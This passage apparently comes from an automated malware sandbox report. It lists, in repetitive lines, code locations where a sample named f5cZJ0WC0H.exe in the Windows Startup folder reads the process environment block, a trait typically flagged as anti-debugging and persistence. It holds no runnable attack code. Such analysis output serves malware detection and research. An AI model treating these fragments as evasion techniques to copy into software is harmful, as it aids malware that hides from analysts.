          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01143B7A mov eax, dword ptr fs:[00000030h]21_2_01143B7A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01143B7A mov eax, dword ptr fs:[00000030h]21_2_01143B7A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111DB60 mov ecx, dword ptr fs:[00000030h]21_2_0111DB60
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01142397 mov eax, dword ptr fs:[00000030h]21_2_01142397
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114B390 mov eax, dword ptr fs:[00000030h]21_2_0114B390
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D138A mov eax, dword ptr fs:[00000030h]21_2_011D138A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011CD380 mov ecx, dword ptr fs:[00000030h]21_2_011CD380
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01121B8F mov eax, dword ptr fs:[00000030h]21_2_01121B8F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01121B8F mov eax, dword ptr fs:[00000030h]21_2_01121B8F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01144BAD mov eax, dword ptr fs:[00000030h]21_2_01144BAD
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01144BAD mov eax, dword ptr fs:[00000030h]21_2_01144BAD
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01144BAD mov eax, dword ptr fs:[00000030h]21_2_01144BAD
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E5BA5 mov eax, dword ptr fs:[00000030h]21_2_011E5BA5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011953CA mov eax, dword ptr fs:[00000030h]21_2_011953CA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011953CA mov eax, dword ptr fs:[00000030h]21_2_011953CA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011403E2 mov eax, dword ptr fs:[00000030h]21_2_011403E2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011403E2 mov eax, dword ptr fs:[00000030h]21_2_011403E2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011403E2 mov eax, dword ptr fs:[00000030h]21_2_011403E2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011403E2 mov eax, dword ptr fs:[00000030h]21_2_011403E2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011403E2 mov eax, dword ptr fs:[00000030h]21_2_011403E2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011403E2 mov eax, dword ptr fs:[00000030h]21_2_011403E2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113DBE9 mov eax, dword ptr fs:[00000030h]21_2_0113DBE9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01115210 mov eax, dword ptr fs:[00000030h]21_2_01115210
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01115210 mov ecx, dword ptr fs:[00000030h]21_2_01115210
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01115210 mov eax, dword ptr fs:[00000030h]21_2_01115210
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01115210 mov eax, dword ptr fs:[00000030h]21_2_01115210
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111AA16 mov eax, dword ptr fs:[00000030h]21_2_0111AA16
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111AA16 mov eax, dword ptr fs:[00000030h]21_2_0111AA16
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DAA16 mov eax, dword ptr fs:[00000030h]21_2_011DAA16
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DAA16 mov eax, dword ptr fs:[00000030h]21_2_011DAA16
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01133A1C mov eax, dword ptr fs:[00000030h]21_2_01133A1C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01128A0A mov eax, dword ptr fs:[00000030h]21_2_01128A0A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01154A2C mov eax, dword ptr fs:[00000030h]21_2_01154A2C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01154A2C mov eax, dword ptr fs:[00000030h]21_2_01154A2C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DEA55 mov eax, dword ptr fs:[00000030h]21_2_011DEA55
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011A4257 mov eax, dword ptr fs:[00000030h]21_2_011A4257
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01119240 mov eax, dword ptr fs:[00000030h]21_2_01119240
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01119240 mov eax, dword ptr fs:[00000030h]21_2_01119240
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01119240 mov eax, dword ptr fs:[00000030h]21_2_01119240
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01119240 mov eax, dword ptr fs:[00000030h]21_2_01119240
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0115927A mov eax, dword ptr fs:[00000030h]21_2_0115927A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011CB260 mov eax, dword ptr fs:[00000030h]21_2_011CB260
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011CB260 mov eax, dword ptr fs:[00000030h]21_2_011CB260
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E8A62 mov eax, dword ptr fs:[00000030h]21_2_011E8A62
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114D294 mov eax, dword ptr fs:[00000030h]21_2_0114D294
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114D294 mov eax, dword ptr fs:[00000030h]21_2_0114D294
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112AAB0 mov eax, dword ptr fs:[00000030h]21_2_0112AAB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112AAB0 mov eax, dword ptr fs:[00000030h]21_2_0112AAB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114FAB0 mov eax, dword ptr fs:[00000030h]21_2_0114FAB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011152A5 mov eax, dword ptr fs:[00000030h]21_2_011152A5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011152A5 mov eax, dword ptr fs:[00000030h]21_2_011152A5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011152A5 mov eax, dword ptr fs:[00000030h]21_2_011152A5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011152A5 mov eax, dword ptr fs:[00000030h]21_2_011152A5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011152A5 mov eax, dword ptr fs:[00000030h]21_2_011152A5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01142ACB mov eax, dword ptr fs:[00000030h]21_2_01142ACB
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01142AE4 mov eax, dword ptr fs:[00000030h]21_2_01142AE4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111AD30 mov eax, dword ptr fs:[00000030h]21_2_0111AD30
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DE539 mov eax, dword ptr fs:[00000030h]21_2_011DE539
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]21_2_01123D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]21_2_01123D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]21_2_01123D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]21_2_01123D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]21_2_01123D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]21_2_01123D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]21_2_01123D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]21_2_01123D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]21_2_01123D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]21_2_01123D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]21_2_01123D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]21_2_01123D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]21_2_01123D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E8D34 mov eax, dword ptr fs:[00000030h]21_2_011E8D34
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0119A537 mov eax, dword ptr fs:[00000030h]21_2_0119A537
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01144D3B mov eax, dword ptr fs:[00000030h]21_2_01144D3B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01144D3B mov eax, dword ptr fs:[00000030h]21_2_01144D3B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01144D3B mov eax, dword ptr fs:[00000030h]21_2_01144D3B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01137D50 mov eax, dword ptr fs:[00000030h]21_2_01137D50
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01153D43 mov eax, dword ptr fs:[00000030h]21_2_01153D43
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01193540 mov eax, dword ptr fs:[00000030h]21_2_01193540
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113C577 mov eax, dword ptr fs:[00000030h]21_2_0113C577
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113C577 mov eax, dword ptr fs:[00000030h]21_2_0113C577
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114FD9B mov eax, dword ptr fs:[00000030h]21_2_0114FD9B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114FD9B mov eax, dword ptr fs:[00000030h]21_2_0114FD9B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01142581 mov eax, dword ptr fs:[00000030h]21_2_01142581
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01142581 mov eax, dword ptr fs:[00000030h]21_2_01142581
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01142581 mov eax, dword ptr fs:[00000030h]21_2_01142581
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01142581 mov eax, dword ptr fs:[00000030h]21_2_01142581
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01112D8A mov eax, dword ptr fs:[00000030h]21_2_01112D8A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01112D8A mov eax, dword ptr fs:[00000030h]21_2_01112D8A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01112D8A mov eax, dword ptr fs:[00000030h]21_2_01112D8A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01112D8A mov eax, dword ptr fs:[00000030h]21_2_01112D8A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01112D8A mov eax, dword ptr fs:[00000030h]21_2_01112D8A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01141DB5 mov eax, dword ptr fs:[00000030h]21_2_01141DB5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01141DB5 mov eax, dword ptr fs:[00000030h]21_2_01141DB5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01141DB5 mov eax, dword ptr fs:[00000030h]21_2_01141DB5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E05AC mov eax, dword ptr fs:[00000030h]21_2_011E05AC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E05AC mov eax, dword ptr fs:[00000030h]21_2_011E05AC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011435A1 mov eax, dword ptr fs:[00000030h]21_2_011435A1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196DC9 mov eax, dword ptr fs:[00000030h]21_2_01196DC9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196DC9 mov eax, dword ptr fs:[00000030h]21_2_01196DC9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196DC9 mov eax, dword ptr fs:[00000030h]21_2_01196DC9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196DC9 mov ecx, dword ptr fs:[00000030h]21_2_01196DC9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196DC9 mov eax, dword ptr fs:[00000030h]21_2_01196DC9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196DC9 mov eax, dword ptr fs:[00000030h]21_2_01196DC9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011C8DF1 mov eax, dword ptr fs:[00000030h]21_2_011C8DF1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112D5E0 mov eax, dword ptr fs:[00000030h]21_2_0112D5E0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112D5E0 mov eax, dword ptr fs:[00000030h]21_2_0112D5E0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DFDE2 mov eax, dword ptr fs:[00000030h]21_2_011DFDE2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DFDE2 mov eax, dword ptr fs:[00000030h]21_2_011DFDE2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DFDE2 mov eax, dword ptr fs:[00000030h]21_2_011DFDE2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DFDE2 mov eax, dword ptr fs:[00000030h]21_2_011DFDE2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E740D mov eax, dword ptr fs:[00000030h]21_2_011E740D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E740D mov eax, dword ptr fs:[00000030h]21_2_011E740D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E740D mov eax, dword ptr fs:[00000030h]21_2_011E740D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196C0A mov eax, dword ptr fs:[00000030h]21_2_01196C0A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196C0A mov eax, dword ptr fs:[00000030h]21_2_01196C0A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196C0A mov eax, dword ptr fs:[00000030h]21_2_01196C0A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196C0A mov eax, dword ptr fs:[00000030h]21_2_01196C0A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114BC2C mov eax, dword ptr fs:[00000030h]21_2_0114BC2C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AC450 mov eax, dword ptr fs:[00000030h]21_2_011AC450
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AC450 mov eax, dword ptr fs:[00000030h]21_2_011AC450
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114A44B mov eax, dword ptr fs:[00000030h]21_2_0114A44B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113746D mov eax, dword ptr fs:[00000030h]21_2_0113746D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112849B mov eax, dword ptr fs:[00000030h]21_2_0112849B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E8CD6 mov eax, dword ptr fs:[00000030h]21_2_011E8CD6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D14FB mov eax, dword ptr fs:[00000030h]21_2_011D14FB
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196CF0 mov eax, dword ptr fs:[00000030h]21_2_01196CF0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196CF0 mov eax, dword ptr fs:[00000030h]21_2_01196CF0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196CF0 mov eax, dword ptr fs:[00000030h]21_2_01196CF0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113F716 mov eax, dword ptr fs:[00000030h]21_2_0113F716
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AFF10 mov eax, dword ptr fs:[00000030h]21_2_011AFF10
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AFF10 mov eax, dword ptr fs:[00000030h]21_2_011AFF10
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E070D mov eax, dword ptr fs:[00000030h]21_2_011E070D
